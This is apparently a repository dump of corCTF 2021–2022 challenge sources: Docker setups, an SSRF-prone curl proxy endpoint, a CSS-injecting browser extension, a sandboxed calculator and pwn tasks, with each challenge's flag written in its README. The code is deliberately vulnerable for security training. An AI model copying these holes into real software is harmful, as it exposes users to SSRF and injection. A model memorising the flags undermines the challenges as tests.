12 |   libxkbcommon0 libxcomposite1 libxdamage1 libxrandr2 libgbm1 libgtk-3-0 \
13 |   libasound2 libxshmfence1 libx11-xcb1 && rm -rf /var/lib/apt/lists/*
14 | 
15 | RUN groupadd -r user && useradd --no-log-init -m -r -g user user
16 | 
17 | RUN mkdir /code
18 | RUN chown user /code
19 | 
20 | USER user
21 | 
22 | WORKDIR /code
23 | 
24 | RUN curl -fsS https://files.be.ax/public/chromium-91.0.4472.148-2021-07-06.tar.bz2 | tar xj
25 | 
26 | COPY . /code
27 | 
28 | RUN npm install
29 | 
30 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/chall/browser.js:
--------------------------------------------------------------------------------
 1 | const puppeteer = require('puppeteer');
 2 | 
 3 | const url = process.argv[2];
 4 | 
 5 | async function main() {
 6 | 	const browser = await puppeteer.launch({
 7 | 		headless: true,
 8 | 		dumpio: true,
 9 | 		args: ['--no-sandbox'],
10 | 		executablePath: '/code/chromium/chrome'
11 | 	});
12 | 	const page = await browser.newPage();
13 | 	await page.setDefaultNavigationTimeout(45 * 1000);
14 | 	await page.goto(url);
15 | }
16 | 
17 | main();


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/chall/index.js:
--------------------------------------------------------------------------------
1 | require('./public');
2 | require('./private');


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/chall/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "saasme",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "fastify": "^3.19.2",
13 |     "fastify-static": "^4.2.2",
14 |     "node-fetch": "^2.6.1",
15 |     "puppeteer": "^10.1.0"
16 |   }
17 | }
18 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/chall/private.js:
--------------------------------------------------------------------------------
 1 | const fastify = require('fastify')();
 2 | const spawn = require('child_process').spawn;
 3 | const schema = require('./schema');
 4 | 
 5 | fastify.post('/curl', { schema }, (req, res) => {
 6 | 	let url;
 7 | 	try {
 8 | 		url = new URL(req.body.url);
 9 | 	} catch(e) {
10 | 		return res.status(400).send('Invalid URL!');
11 | 	}
12 | 
13 | 	console.log('[CURL] Visiting', url);
14 | 
15 | 	// set HOST to prevent SSRF
16 | 	let curl = spawn('curl', ['-H', '"Host: nossrfhere"', '-H', 'User-Agent: ssrf-bot', '-N', '--fail', url.href]);
17 | 
18 | 	let running = true;
19 | 
20 | 	let timeout = setTimeout(() => {
21 | 		if (running) process.kill(curl.pid);
22 | 	}, 5000)
23 | 
24 | 	let response = [];
25 | 
26 | 	curl.stdout.on('data', data => response.push(data));
27 | 
28 | 	curl.on('close', code => {
29 | 		clearTimeout(timeout);
30 | 		running = false;
31 | 
32 | 		console.log('[CURL] Exited with code', code);
33 | 		
34 | 		if (code > 0) {
35 | 			return res.send('Invalid URL!');
36 | 		}
37 | 
38 | 		res.type('text/plain').send(Buffer.concat(response));
39 | 	});
40 | });
41 | 
42 | fastify.listen(8001);
43 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/chall/schema.js:
--------------------------------------------------------------------------------
 1 | module.exports = {
 2 | 	body: {
 3 | 		type: 'object',
 4 | 		required: ['url'],
 5 | 		properties: {
 6 | 			url: {
 7 | 				type: 'string',
 8 | 				maxLength: 200,
 9 | 				minLength: 1
10 | 			}
11 | 		}
12 | 	}
13 | }


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/chall/static/assets/css/styles.css:
--------------------------------------------------------------------------------
1 | body, html, h1, h2, h3, h4, h5, h6, a, span, p, div {
2 |   font-family: "MS Gothic", Arial !important;
3 | }
4 | 
5 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/chall/static/assets/img/saasme.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/saasme/chall/static/assets/img/saasme.jpg


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: "3.9"
 2 | services:
 3 |   chall:
 4 |     build:
 5 |       context: ./chall
 6 |       dockerfile: Dockerfile
 7 |     networks:
 8 |       - saasme
 9 |     ports:
10 |       - '80:8000'
11 | 
12 |   flag:
13 |     build:
14 |       context: ./flag
15 |       dockerfile: Dockerfile
16 |     networks:
17 |       - saasme
18 |     environment:
19 |       - FLAG=corctf{1_10v3_saas_and_a11_1t_stands_f0r}
20 | 
21 | networks:
22 |   saasme: {}
23 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/flag/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM curlimages/curl:latest
2 | 
3 | COPY send_flag.sh /
4 | 
5 | CMD ["sh", "/send_flag.sh"]


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/flag/send_flag.sh:
--------------------------------------------------------------------------------
1 | while [ true ]
2 | do
3 |   curl -G "http://chall:8000/flag" --data-urlencode "flag=$FLAG"
4 |   sleep 15
5 | done


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Insane
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | Yet another Chrome extension web challenge... wait, the extension is on the Chrome Web Store??
 8 | 
 9 | hint 1: wow, that's such a weird way to parse stylesheets, huh?
10 | 
11 | hint 2: this site is #amazing and #great
12 | 
13 | hint 3: why don't you guys #focus more on this challenge?
14 | 
15 | NOTE: the admin bot isn't logged into any account, but it can do requests to the localhost instance at `http://localhost`, giving the admin bot admin access
16 | ```
17 | 
18 | Flag: `corctf{omg_css_is_sooooo_vulnerable!!!!!!!!!!}`
19 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/.dockerignore:
--------------------------------------------------------------------------------
1 | Dockerfile
2 | node_modules/


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:12.10.0
 2 | 
 3 | RUN  apt-get update \
 4 |      && apt-get install -yq libgconf-2-4 \
 5 |      && apt-get install -y wget xvfb --no-install-recommends \
 6 |      && wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - \
 7 |      && sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' \
 8 |      && apt-get update \
 9 |      && apt-get install -y google-chrome-stable --no-install-recommends \
10 |      && rm -rf /var/lib/apt/lists/*
11 | 
12 | ENV PUPPETEER_SKIP_CHROMIUM_DOWNLOAD true
13 | 
14 | WORKDIR /usr/src/app
15 | 
16 | COPY package.json .
17 | 
18 | RUN npm install
19 | 
20 | COPY . .
21 | 
22 | RUN useradd -ms /bin/bash app
23 | 
24 | RUN chown app:app /usr/src/app
25 | RUN chmod +x entrypoint.sh
26 | RUN chmod +x startdisplay.sh
27 | 
28 | USER app
29 | 
30 | CMD ["./entrypoint.sh"]
31 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/entrypoint.sh:
--------------------------------------------------------------------------------
1 | export DISPLAY=:99.0
2 | export PUPPETEER_EXEC_PATH="google-chrome-stable"
3 | 
4 | bash startdisplay.sh &
5 | 
6 | while true
7 | do
8 |     node index.js
9 | done


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/extension/background.js:
--------------------------------------------------------------------------------
 1 | chrome.runtime.onMessage.addListener(async (request, sender, sendResponse) => {
 2 |     if (request.method === "installCSS" && request.css) {
 3 |         let injection = { 
 4 |             target: {
 5 |                 tabId: sender.tab.id
 6 |             },
 7 |             css: request.css
 8 |         };
 9 |         if(sender.frameId !== 0) {
10 |             injection.target.frameIds = [sender.frameId];
11 |         }
12 |         chrome.scripting.insertCSS(injection);
13 |     }
14 | });
15 | 
16 | chrome.action.onClicked.addListener((tab) => {
17 |     chrome.runtime.openOptionsPage();
18 | });


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/extension/icon128.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/admin/extension/icon128.png


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/extension/icon16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/admin/extension/icon16.png


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/extension/icon48.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/admin/extension/icon48.png


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/extension/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "manifest_version": 3,
 3 |     "name": "styleme",
 4 |     "version": "0.0.0.2",
 5 |     "icons": {
 6 |         "16": "icon16.png",
 7 |         "48": "icon48.png",
 8 |         "128": "icon128.png"
 9 |     },
10 |     "content_scripts": [
11 |         {
12 |             "matches": ["<all_urls>"],
13 |             "js": ["content.js"],
14 |             "all_frames": true
15 |         }
16 |     ],
17 |     "background": {
18 |         "service_worker": "background.js"
19 |     },
20 |     "permissions": [
21 |         "storage",
22 |         "scripting",
23 |         "unlimitedStorage"
24 |     ],
25 |     "host_permissions": ["<all_urls>"],
26 |     "options_page": "options.html",
27 |     "options_ui": {
28 |         "open_in_tab": true,
29 |         "page": "options.html"
30 |     },
31 |     "action": {}
32 | }


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/extension/options.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <body>
 4 |         <h1>styleme options</h1>
 5 |         <hr />
 6 |         <h2>list of installed styles:</h2>
 7 |         <div id="installed">
 8 |             
 9 |         </div>
10 |         <script src="option.js"></script>
11 |     </body>
12 | </html>


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/index.js:
--------------------------------------------------------------------------------
 1 | const express = require("express");
 2 | const { createProxyMiddleware } = require('http-proxy-middleware');
 3 | const app = express();
 4 | 
 5 | require("dotenv").config();
 6 | 
 7 | const PORT = process.env.PORT ? parseInt(process.env.PORT) : 80;
 8 | 
 9 | const admin = require("./admin.js");
10 | 
11 | app.use(express.urlencoded({ extended: false }));
12 | app.use(express.json());
13 | 
14 | app.post("/xss/add", (req, res) => {
15 |     if(!req.headers.authorization || req.headers.authorization !== process.env.XSSBOT_SECRET) {
16 |         return res.end("unauthorized");
17 |     }
18 | 
19 |     let { url } = req.body;
20 |     if(!url) {
21 |         return res.end("missing url");
22 |     }
23 |     admin.addToQueue(url);
24 |     return res.end("done");
25 | });
26 | 
27 | // proxy requests to http://localhost to the challenge page, 
28 | // helps so players don't have to think about infra
29 | app.use('/', createProxyMiddleware({ target: 'http://chall', changeOrigin: true }));
30 | 
31 | app.listen(PORT, () => {
32 |     console.log(`xss bot listening on port ${PORT}`);
33 | });


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "admin",
 3 |   "version": "1.0.0",
 4 |   "main": "index.js",
 5 |   "scripts": {
 6 |     "test": "echo \"Error: no test specified\" && exit 1"
 7 |   },
 8 |   "author": "",
 9 |   "license": "ISC",
10 |   "dependencies": {
11 |     "dotenv": "^10.0.0",
12 |     "express": "^4.17.1",
13 |     "http-proxy-middleware": "^2.0.0",
14 |     "puppeteer": "^10.1.0"
15 |   },
16 |   "description": ""
17 | }
18 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin/startdisplay.sh:
--------------------------------------------------------------------------------
1 | export DISPLAY=:99.0
2 | export PUPPETEER_EXEC_PATH="google-chrome-stable"
3 | 
4 | while true
5 | do
6 |     Xvfb -ac :99 -screen 0 1280x1024x16 > /dev/null 2>&1
7 | done


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin_test/extension/icon128.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/admin_test/extension/icon128.png


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin_test/extension/icon16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/admin_test/extension/icon16.png


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin_test/extension/icon48.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/admin_test/extension/icon48.png


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin_test/extension/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "manifest_version": 3,
 3 |     "name": "styleme",
 4 |     "version": "0.0.0.4",
 5 |     "icons": {
 6 |         "16": "icon16.png",
 7 |         "48": "icon48.png",
 8 |         "128": "icon128.png"
 9 |     },
10 |     "content_scripts": [
11 |         {
12 |             "matches": ["<all_urls>"],
13 |             "js": ["content.js"],
14 |             "all_frames": true
15 |         }
16 |     ],
17 |     "background": {
18 |         "service_worker": "background.js"
19 |     },
20 |     "permissions": [
21 |         "storage",
22 |         "scripting",
23 |         "unlimitedStorage"
24 |     ],
25 |     "host_permissions": ["<all_urls>"],
26 |     "options_page": "options.html",
27 |     "options_ui": {
28 |         "open_in_tab": true,
29 |         "page": "options.html"
30 |     },
31 |     "action": {}
32 | }


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin_test/extension/options.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <body>
 4 |         <h1>styleme options</h1>
 5 |         <hr />
 6 |         <h2>list of installed styles:</h2>
 7 |         <div id="installed">
 8 |             
 9 |         </div>
10 |         <script src="option.js"></script>
11 |     </body>
12 | </html>


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/admin_test/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "admin_test",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "puppeteer": "^9.1.0"
13 |   }
14 | }
15 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/.dockerignore:
--------------------------------------------------------------------------------
1 | Dockerfile
2 | node_modules/
3 | styleme.sqlite3


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:14-alpine
 2 | 
 3 | RUN mkdir -p /app
 4 | 
 5 | WORKDIR /app
 6 | 
 7 | COPY package.json .
 8 | 
 9 | RUN npm install
10 | 
11 | COPY . .
12 | 
13 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "styleme",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "dependencies": {
 7 |     "bcrypt": "^5.0.1",
 8 |     "dotenv": "^10.0.0",
 9 |     "express": "^4.17.1",
10 |     "express-session": "^1.17.2",
11 |     "hbs": "^4.1.2",
12 |     "memorystore": "^1.6.6",
13 |     "node-fetch": "^2.6.1",
14 |     "sequelize": "^6.6.5",
15 |     "sqlite3": "^5.0.2"
16 |   },
17 |   "devDependencies": {},
18 |   "scripts": {
19 |     "test": "echo \"Error: no test specified\" && exit 1"
20 |   },
21 |   "author": "",
22 |   "license": "ISC"
23 | }
24 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/css/styles.min.css:
--------------------------------------------------------------------------------
1 | body,html{height:100%}body{background:#4568dc;background:-webkit-linear-gradient(to left,#b06ab3,#4568dc);background:linear-gradient(to left,#b06ab3,#4568dc)}.content{border-radius:.75rem;margin-bottom:1rem}.content-top{top:0}.title{color:#fff;margin-bottom:2rem}.card-title{margin-bottom:1.5rem}.CodeMirror.cm-s-default{font-size:12px}


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-brands-400.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-brands-400.eot


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-brands-400.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-brands-400.ttf


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-brands-400.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-brands-400.woff


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-brands-400.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-brands-400.woff2


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-regular-400.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-regular-400.eot


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-regular-400.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-regular-400.ttf


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-regular-400.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-regular-400.woff


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-regular-400.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-regular-400.woff2


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-solid-900.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-solid-900.eot


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-solid-900.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-solid-900.ttf


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-solid-900.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-solid-900.woff


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-solid-900.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/styleme/chall/public/assets/fonts/fa-solid-900.woff2


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/views/login.hbs:
--------------------------------------------------------------------------------
 1 | <div class="card content">
 2 |     <div class="card-body">
 3 |         <h4 class="card-title"><i class="fas fa-paint-brush"></i>&nbsp;login</h4>
 4 |         <form method="POST" action="/api/login">
 5 |             <div class="form-group">
 6 |                 <label>Username</label>
 7 |                 <input class="form-control" type="text" name="user" required>
 8 |             </div>
 9 |             <div class="form-group">
10 |                 <label>Password</label>
11 |                 <input class="form-control" type="password" name="pass" required>
12 |             </div>
13 |             <div class="form-group">
14 |                 <button class="btn btn-primary" type="submit">Login</button>
15 |             </div>
16 |         </form>
17 |         <a href="/" id="back">&larr; Back</a>
18 |     </div>
19 | </div>


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/views/register.hbs:
--------------------------------------------------------------------------------
 1 | <div class="card content">
 2 |     <div class="card-body">
 3 |         <h4 class="card-title"><i class="fas fa-paint-brush"></i>&nbsp;register</h4>
 4 |         <form method="POST" action="/api/register">
 5 |             <div class="form-group">
 6 |                 <label>Username</label>
 7 |                 <input class="form-control" type="text" name="user" required>
 8 |             </div>
 9 |             <div class="form-group">
10 |                 <label>Password</label>
11 |                 <input class="form-control" type="password" name="pass" required>
12 |             </div>
13 |             <div class="form-group">
14 |                 <button class="btn btn-primary" type="submit">Register</button>
15 |             </div>
16 |         </form>
17 |         <a href="/" id="back">&larr; Back</a>
18 |     </div>
19 | </div>


--------------------------------------------------------------------------------
/corCTF-2021/web/styleme/chall/views/submit.hbs:
--------------------------------------------------------------------------------
 1 | <div class="card content">
 2 |     <div class="card-body">
 3 |         <h4 class="card-title"><i class="fas fa-paint-brush"></i>&nbsp;submit</h4>
 4 |         <h6 class="card-text">Have a cool style you want to show off? Submit it to the admin to see if they like it!<br />
 5 |         Note: The admin will only install stylescripts hosted from this site.</h6>
 6 |         <form method="POST" action="/api/submit">
 7 |             <div class="form-group">
 8 |                 <label>URL</label>
 9 |                 <input class="form-control" type="url" name="url" required>
10 |             </div>
11 |             <div class="form-group">
12 |                 <button class="btn btn-primary" type="submit">Submit</button>
13 |             </div>
14 |         </form>
15 |         <a href="/" id="back">&larr; Back</a>
16 |     </div>
17 | </div>


--------------------------------------------------------------------------------
/corCTF-2022/misc/sbxcalc/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 11
 2 | 
 3 | Author: strellic
 4 | 
 5 | Description:
 6 | 
 7 | Yet another sandboxed JavaScript calculator... have fun :)
 8 | 
 9 | Flag: `corctf{d0nt_you_just_l0ve_j4vascript?}`
10 | 


--------------------------------------------------------------------------------
/corCTF-2022/misc/sbxcalc/task/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM node:18.1.0-bullseye-slim
2 | WORKDIR /app
3 | COPY package.json ./
4 | COPY views ./views
5 | RUN npm i
6 | COPY app.js .
7 | CMD ["node", "app.js"]


--------------------------------------------------------------------------------
/corCTF-2022/misc/sbxcalc/task/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "sbxcalc",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "app.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "strellic",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.18.1",
13 |     "hbs": "^4.2.0",
14 |     "vm2": "^3.9.10"
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/corCTF-2022/misc/sbxcalc/task/views/index.hbs:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <meta name="viewport" content="width=device-width, initial-scale=1">
 5 |         <title>sbxcalc</title>
 6 |         <link rel="stylesheet" href="https://unpkg.com/purecss@2.0.6/build/pure-min.css" integrity="sha384-Uu6IeWbM+gzNVXJcM9XV3SohHtmWE+3VGi496jvgX1jyvDTXfdK+rfZc8C1Aehk5" crossorigin="anonymous">
 7 |     </head>
 8 |     <body>
 9 |         <div style="margin: 4rem">
10 |             <h1>sbxcalc</h1>
11 | 
12 |             {{#if output}}
13 |             <h3>result: <output>{{output}}</output></h3>
14 |             {{/if}}
15 | 
16 |             <form method="GET" class="pure-form">
17 |                 <input type="text" name="calc" value="{{calc}}" placeholder="calculator" />
18 |                 <input type="submit" class="pure-button pure-button-primary" />
19 |             </form>
20 |         </div>
21 |     </body>
22 | </html>


--------------------------------------------------------------------------------
/corCTF-2022/pwn/babypwn/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 114
 2 | 
 3 | Author: strellic
 4 | 
 5 | Description:
 6 | 
 7 | Just another one of those typical intro babypwn challs... wait, why is this in Rust?
 8 | 
 9 | Flag: `corctf{why_w4s_th4t_1n_rust???}`
10 | 


--------------------------------------------------------------------------------
/corCTF-2022/pwn/babypwn/src/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "babypwn"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | 
 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 7 | 
 8 | [dependencies]
 9 | libc = "0.2.126"
10 | libc-stdhandle = "0.1.0"
11 | 


--------------------------------------------------------------------------------
/corCTF-2022/pwn/babypwn/task/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM pwn.red/jail:0.3.0
2 | COPY --from=ubuntu:20.04 / /srv
3 | COPY babypwn /srv/app/run
4 | COPY flag.txt /srv/app
5 | 


--------------------------------------------------------------------------------
/corCTF-2022/pwn/babypwn/task/babypwn:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2022/pwn/babypwn/task/babypwn


--------------------------------------------------------------------------------
/corCTF-2022/pwn/babypwn/task/flag.txt:
--------------------------------------------------------------------------------
1 | corctf{why_w4s_th4t_1n_rust???}
2 | 


--------------------------------------------------------------------------------
/corCTF-2022/pwn/babypwn/task/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2022/pwn/babypwn/task/libc.so.6


--------------------------------------------------------------------------------
/corCTF-2022/pwn/solidarity/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 6
 2 | 
 3 | Author: strellic
 4 | 
 5 | Description:
 6 | 
 7 | The Crusaders of Rust CTF team stands in solidarity... with otters?
 8 | 
 9 | Flag: `corctf{solid4rity_for_the_ott3r_cause}`
10 | 


--------------------------------------------------------------------------------
/corCTF-2022/pwn/solidarity/src/program/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "solidarity"
 3 | version = "1.0.0"
 4 | edition = "2021"
 5 | 
 6 | [features]
 7 | no-entrypoint = []
 8 | 
 9 | [dependencies]
10 | borsh = "0.9.3"
11 | borsh-derive = "0.9.3"
12 | solana-program = "1.8.14"
13 | 
14 | [lib]
15 | crate-type = ["cdylib", "lib"]


--------------------------------------------------------------------------------
/corCTF-2022/pwn/solidarity/src/program/Makefile:
--------------------------------------------------------------------------------
1 | .PHONY: build
2 | build:
3 | 	cargo build-bpf
4 | 	cp ./target/deploy/solidarity.so ../challenge
5 | 


--------------------------------------------------------------------------------
/corCTF-2022/pwn/solidarity/src/program/src/entrypoint.rs:
--------------------------------------------------------------------------------
 1 | #![cfg(not(feature = "no-entrypoint"))]
 2 | 
 3 | use solana_program::{
 4 |   account_info::AccountInfo, entrypoint, entrypoint::ProgramResult, pubkey::Pubkey,
 5 | };
 6 | 
 7 | entrypoint!(process_instruction);
 8 | fn process_instruction(
 9 |   program_id: &Pubkey,
10 |   accounts: &[AccountInfo],
11 |   instruction_data: &[u8],
12 | ) -> ProgramResult {
13 |   crate::processor::process_instruction(program_id, accounts, instruction_data)
14 | }


--------------------------------------------------------------------------------
/corCTF-2022/pwn/solidarity/src/server/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "solidarity-server"
 3 | version = "1.0.0"
 4 | edition = "2021"
 5 | 
 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 7 | 
 8 | [dependencies]
 9 | sol-ctf-framework = "0.1.0"
10 | solidarity = { version = "1.0.0", path = "../program" }
11 | poc-framework-osec = "0.1.1"
12 | solana-program = "1.8.14"
13 | threadpool = "1.8.1"
14 | 


--------------------------------------------------------------------------------
/corCTF-2022/pwn/solidarity/src/server/Makefile:
--------------------------------------------------------------------------------
1 | .PHONY: build
2 | build:
3 | 	cargo build --release
4 | 	cp ./target/release/solidarity-server ../challenge


--------------------------------------------------------------------------------
/corCTF-2022/pwn/solidarity/task/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM debian:bullseye-slim
 2 | COPY --from=krallin/ubuntu-tini /usr/bin/tini /tini
 3 | ENTRYPOINT ["/tini", "--"]
 4 | 
 5 | RUN apt-get update && \
 6 |     apt-get -y install libudev-dev libssl-dev pkg-config && \
 7 |     rm -rf /var/lib/apt/lists/*
 8 | 
 9 | WORKDIR /app
10 | COPY solidarity-server solidarity.so ./
11 | 
12 | EXPOSE 5000
13 | USER nobody
14 | CMD ["/app/solidarity-server"]
15 | 


--------------------------------------------------------------------------------
/corCTF-2022/pwn/solidarity/task/solidarity-server:
